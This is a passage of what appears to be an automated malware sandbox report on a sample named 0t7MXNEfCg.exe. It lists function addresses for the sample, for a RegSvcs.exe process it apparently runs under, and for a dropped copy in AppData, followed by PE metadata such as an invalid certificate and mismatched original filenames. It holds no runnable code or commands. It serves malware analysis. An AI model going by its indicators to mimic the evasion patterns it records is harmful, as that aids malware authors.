                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016334270_2_01633427
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0163343F0_2_0163343F
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016357A80_2_016357A8
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_016357980_2_01635798
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_01639E000_2_01639E00
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_01634EA80_2_01634EA8
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_01634E980_2_01634E98
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_019027580_2_01902758
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_019027490_2_01902749
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0190D56C0_2_0190D56C
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0A0213380_2_0A021338
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0A020BCB0_2_0A020BCB
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B0257580_2_0B025758
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B0230380_2_0B023038
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B0250D80_2_0B0250D8
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B0257570_2_0B025757
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B022C000_2_0B022C00
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0B0234700_2_0B023470
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0C3E43180_2_0C3E4318
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exeCode function: 0_2_0C3E33280_2_0C3E3328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004188237_2_00418823
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041009A7_2_0041009A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004100A37_2_004100A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00416A1E7_2_00416A1E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00416A237_2_00416A23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004102C37_2_004102C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040E2997_2_0040E299
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040E2A37_2_0040E2A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040E3F27_2_0040E3F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040E3F37_2_0040E3F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401B837_2_00401B83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00401B907_2_00401B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040E43C7_2_0040E43C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0042ED437_2_0042ED43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040E6067_2_0040E606
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004026E07_2_004026E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402FD57_2_00402FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402FE07_2_00402FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F520007_2_00F52000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F781CC7_2_00F781CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F801AA7_2_00F801AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F741A27_2_00F741A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F821AE7_2_00F821AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F481587_2_00F48158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB01007_2_00EB0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5A1187_2_00F5A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F402C07_2_00F402C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE3F07_2_00ECE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F803E67_2_00F803E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7A3527_2_00F7A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6E4F67_2_00F6E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F724467_2_00F72446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F644207_2_00F64420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F805917_2_00F80591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC05357_2_00EC0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDC6E07_2_00EDC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBC7C07_2_00EBC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC07707_2_00EC0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE47507_2_00EE4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE8F07_2_00EEE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA68B87_2_00EA68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECA8407_2_00ECA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC29A07_2_00EC29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED69627_2_00ED6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBEA807_2_00EBEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F76BD77_2_00F76BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7EB897_2_00F7EB89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7AB407_2_00F7AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB0CF27_2_00EB0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0C007_2_00EC0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBADE07_2_00EBADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC8DC07_2_00EC8DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED8DBF7_2_00ED8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5CD1F7_2_00F5CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECAD007_2_00ECAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7EEDB7_2_00F7EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7CE937_2_00F7CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED2E907_2_00ED2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7EE267_2_00F7EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB2FC87_2_00EB2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3EFA07_2_00F3EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F34F407_2_00F34F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F62F307_2_00F62F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F02F287_2_00F02F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE0F307_2_00EE0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7F0E07_2_00F7F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F770E97_2_00F770E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6F0CC7_2_00F6F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECB1B07_2_00ECB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF516C7_2_00EF516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F8B16B7_2_00F8B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAF1727_2_00EAF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F612ED7_2_00F612ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDD2F07_2_00EDD2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDB2C07_2_00EDB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC52A07_2_00EC52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAD34C7_2_00EAD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7132D7_2_00F7132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB14607_2_00EB1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7F43F7_2_00F7F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F895C37_2_00F895C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5D5B07_2_00F5D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F775717_2_00F77571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F716CC7_2_00F716CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F056307_2_00F05630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB17EC7_2_00EB17EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7F7B07_2_00F7F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC38E07_2_00EC38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2D8007_2_00F2D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC59907_2_00EC5990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC99507_2_00EC9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDB9507_2_00EDB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F559107_2_00F55910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6DAC67_2_00F6DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F61AA37_2_00F61AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5DAAC7_2_00F5DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F33A6C7_2_00F33A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F77A467_2_00F77A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7FA497_2_00F7FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F35BF07_2_00F35BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EFDBF97_2_00EFDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDFB807_2_00EDFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7FB767_2_00F7FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7FCF27_2_00F7FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F39C327_2_00F39C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDFDC07_2_00EDFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F77D737_2_00F77D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F71D5A7_2_00F71D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC9EB07_2_00EC9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7FFB17_2_00F7FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC1F927_2_00EC1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7FF097_2_00F7FF09
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019008F18_2_019008F1
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_01901B808_2_01901B80
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019083598_2_01908359
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019013708_2_01901370
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019025F28_2_019025F2
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019034608_2_01903460
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019059F88_2_019059F8
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0190338C8_2_0190338C
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_01905BD88_2_01905BD8
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019012F88_2_019012F8
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_01905A088_2_01905A08
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019055508_2_01905550
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019055408_2_01905540
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019057988_2_01905798
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_019057A88_2_019057A8
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_01904E988_2_01904E98
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_01904EA88_2_01904EA8
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_09DE13388_2_09DE1338
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_09DE13288_2_09DE1328
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0AB152588_2_0AB15258
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0AB158D88_2_0AB158D8
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0AB158C98_2_0AB158C9
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0AB131B88_2_0AB131B8
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0AB12D808_2_0AB12D80
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0AB135F08_2_0AB135F0
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0C1C43188_2_0C1C4318
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0C1C33208_2_0C1C3320
                Source: C:\Users\user\AppData\Roaming\HrovwwypYVlFWB.exeCode function: 8_2_0C1C38388_2_0C1C3838
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012E010012_2_012E0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0132516C12_2_0132516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012DF17212_2_012DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012FB1B012_2_012FB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F000012_2_012F0000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F605312_2_012F6053
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F70C012_2_012F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012DD34C12_2_012DD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0133739A12_2_0133739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F33F312_2_012F33F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F52A012_2_012F52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0130D2F012_2_0130D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0130B2C012_2_0130B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_013702C012_2_013702C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F053512_2_012F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F349712_2_012F3497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012FB73012_2_012FB730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F077012_2_012F0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0131475012_2_01314750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012EC7C012_2_012EC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0130C6E012_2_0130C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F691412_2_012F6914
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0130696212_2_01306962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012E197912_2_012E1979
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0130B95012_2_0130B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F995012_2_012F9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F599012_2_012F5990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0135D80012_2_0135D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012FA84012_2_012FA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012D68B812_2_012D68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0131E8F012_2_0131E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F38E012_2_012F38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0130FB8012_2_0130FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01365BF012_2_01365BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0132DBF912_2_0132DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01363A6C12_2_01363A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F2A4512_2_012F2A45
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012EEA8012_2_012EEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012FAD0012_2_012FAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F3D4012_2_012F3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01308DBF12_2_01308DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012EADE012_2_012EADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F8DC012_2_012F8DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0130FDC012_2_0130FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01369C3212_2_01369C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01309C2012_2_01309C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F0C0012_2_012F0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012E0CF212_2_012E0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01310F3012_2_01310F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01332F2812_2_01332F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01364F4012_2_01364F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0136EFA012_2_0136EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F1F9212_2_012F1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012E2FC812_2_012E2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F0E5912_2_012F0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_012F9EB012_2_012F9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_01302E9012_2_01302E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0042ED4312_2_0042ED43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00EF5130 appears 53 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F07E54 appears 102 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F3F290 appears 98 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00EAB970 appears 210 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0135EA12 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01337E54 appears 94 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F2EA12 appears 76 times
                Source: 0t7MXNEfCg.exeStatic PE information: invalid certificate
                Source: 0t7MXNEfCg.exe, 00000000.00000002.934271222.00000000049B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs 0t7MXNEfCg.exe
                Source: 0t7MXNEfCg.exe, 00000000.00000000.858523862.0000000000C72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezGhu.exe: vs 0t7MXNEfCg.exe
                Source: 0t7MXNEfCg.exe, 00000000.00000002.944758824.000000000AF70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 0t7MXNEfCg.exe
                Source: 0t7MXNEfCg.exe, 00000000.00000002.930848160.0000000003240000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs 0t7MXNEfCg.exe
                Source: 0t7MXNEfCg.exe, 00000000.00000002.940130193.0000000009C80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs 0t7MXNEfCg.exe
                Source: 0t7MXNEfCg.exe, 00000000.00000002.929795834.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 0t7MXNEfCg.exe
                Source: 0t7MXNEfCg.exeBinary or memory string: OriginalFilenamezGhu.exe: vs 0t7MXNEfCg.exe
                Source: 0t7MXNEfCg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0t7MXNEfCg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
